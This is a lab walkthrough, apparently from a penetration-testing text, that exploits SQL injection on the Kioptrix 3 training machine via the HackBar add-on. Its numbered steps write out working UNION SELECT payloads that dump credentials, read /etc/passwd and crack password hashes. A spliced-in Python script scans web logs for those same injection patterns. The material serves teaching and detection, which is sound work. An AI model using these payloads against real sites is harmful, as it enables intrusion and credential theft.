The Iceweasel browser provides penetration testers with a myriad of tools that make web application testing efficient and fun, because it can run the many browser plugins that have been written over the years. In this example we use the HackBar plugin within Iceweasel to fully exploit the Kioptrix 3 machine in our lab. You can learn more about HackBar at https://addons.mozilla.org/en-US/firefox/addon/hackbar/. HackBar and the other add-ons available for Iceweasel make testing web applications fun and allow a knowledgeable penetration tester to manually verify the security of a web application.
Open the Iceweasel browser and click on Open menu | Add-ons, located on the right-hand side of the screen next to the home icon. In the Search all add-ons field, enter HackBar and search for the tool; once it is found, install it and restart the browser.

The kind of injection we are working toward is shown below. Run against the gallery's own gallarific_users table, it returns the user admin and the password n0t7t1k4:

http://kioptrix3.com/gallery/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6+from+gallarific_users--

1. Enter http://kioptrix3.com/gallery/gallery.php?id=1 in the HackBar and click on Execute.

2. Click on the http://kioptrix3.com/gallery/gallery.php?id=1 entry in the HackBar, add a space, and then, directly above the HackBar, click SQL | Union Select Statement and enter 6 in the pop-up that appears. Then, click on OK. Click on the HackBar Execute button to verify that the SQL injection works.

3. Replace the 2 in the query that was generated by highlighting it and clicking on SQL | MySQL | Basic Info Column, so that your URL now looks like this: http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),@@version),3,4,5,6

   Click on Execute on the HackBar and review the results. The output should contain the following information: root@localhost:gallery:5.0.51a-3ubuntu5.4. You have successfully enumerated the user, database name, and version that are running.

4. Execute http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database(), which will list all of the tables from the current database.

5. Execute http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4,5,6. This will list the password file from the server.

6. Execute http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,username,password,4,5,6 from dev_accounts, which provides us with the information for the username loneferret, with a password hash value of 5badcaf789d3d1d09794d8f021f40f0e, and the user dreg, with a password hash of 0d3eccfb887aabd50f243b3f155c0f85.

7. We can try to crack these user passwords. Successfully cracking the passwords will provide you with the following credentials: dreg - Mast3r and loneferret - starwars.

These users have fallen into the pitfall of reusing passwords. You can log onto the Kioptrix 1.2 machine in your lab now by opening up an SSH session from your Kali to the Kioptrix machine. Luckily, these accounts are not in the sudoers list. Now, we need to elevate the privilege of one of the accounts.
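Seen from the server side, every step of the injection above leaves a request in the web server's access log, and each of the HackBar helpers used here has a recognisable signature in the query string. The following Python script is an added example, not part of the original recipe, of Kioptrix or of HackBar: it parses Apache combined-format log lines (an assumption about the format), URL-decodes each query parameter, and flags the indicators the walkthrough relies on: UNION SELECT, information_schema, LOAD_FILE, the user()/database()/@@version fingerprint, the "and 1=2" tautology and the trailing -- comment. The log lines, client IPs and timestamps are constructed samples that mirror the URLs used above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (Apache combined format, hypothetical IPs and timestamps).
# Lines 2-6 reproduce the request URLs used in the walkthrough; the rest are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /gallery/gallery.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET /gallery/gallery.php?id=1+UNION+SELECT+1,2,3,4,5,6 HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:55:49 +0000] "GET /gallery/gallery.php?id=1%20UNION%20SELECT%201,CONCAT_WS(CHAR(32,58,32),user(),database(),@@version),3,4,5,6 HTTP/1.1" 200 5230 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:56:02 +0000] "GET /gallery/gallery.php?id=1%20UNION%20SELECT%201,table_name,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 6100 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:56:10 +0000] "GET /gallery/gallery.php?id=1%20UNION%20SELECT%201,LOAD_FILE('/etc/passwd'),3,4,5,6 HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:56:30 +0000] "GET /gallery/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6+from+gallarific_users-- HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:57:00 +0000] "GET /gallery/photos.php?id=12 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:57:05 +0000] "GET /search.php?q=union+station+select+seats HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

# Client IP, timestamp and request line of an Apache/nginx "combined" log entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Indicators are matched against a decoded, lower-cased, whitespace-collapsed parameter value.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b")),
    ("tautology", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b")),
    ("information_schema", re.compile(r"\binformation_schema\b")),
    ("load_file", re.compile(r"\bload_file\s*\(")),
    ("version_probe", re.compile(r"@@version|\bversion\s*\(")),
    ("fingerprint_fn", re.compile(r"\b(?:user|database|current_user)\s*\(\s*\)")),
    ("comment_terminator", re.compile(r"--\s*$|/\*")),
]


def normalize(value):
    """Lower-case, treat /**/ (used as whitespace by some tools) as a space, collapse runs of whitespace."""
    value = value.lower().replace("/**/", " ")
    return re.sub(r"\s+", " ", value).strip()


def scan_value(value):
    """Names of every indicator that fires on one decoded parameter value, in INDICATORS order."""
    norm = normalize(value)
    return [name for name, rx in INDICATORS if rx.search(norm)]


def analyze_request(target):
    """Return {parameter: [indicators]} for each query parameter that trips at least one indicator.

    parse_qsl decodes both '+' and '%20' into spaces, so the two encodings seen in the
    walkthrough (HackBar's '+' and the browser's '%20') are handled identically.
    """
    hits = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        found = scan_value(value)
        if found:
            hits[name] = found
    return hits


def analyze_log(text):
    """One finding per logged request whose query string trips an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = analyze_request(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"], "path": urlsplit(m["target"]).path, "hits": hits})
    return findings


def count_by_ip(findings):
    """Number of flagged requests per client IP; a burst from one address is the alerting signal."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = analyze_log(SAMPLE_LOG)
    for f in results:
        print(f["ts"], f["ip"], f["path"], f["hits"])
    print("flagged requests per IP:", count_by_ip(results))
```

Matching on decoded parameter values rather than on the raw request line is what makes the detector indifferent to the `+` versus `%20` encoding, and the word-boundary check in the UNION SELECT pattern is why the benign "union station select seats" search is not flagged. In practice the score that matters is the per-IP count over a short window: a single stray UNION is noise, but the five-request progression above (column count, fingerprint, table listing, file read, credential dump) from one client is exactly the sequence a tester following this recipe produces.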
At this point, you are almost at root on the Kioptrix Level 1.2 machine. Take your time, look around the server and try to figure out a method of escalating the privilege of either user.
Once you have gained root using SSH, challenge yourself again by uploading a shell to the Kioptrix Level 1.2 machine using nothing but the website! There are several different methods of accomplishing this; if you get stuck, take a look at one of the many walkthroughs on the Web.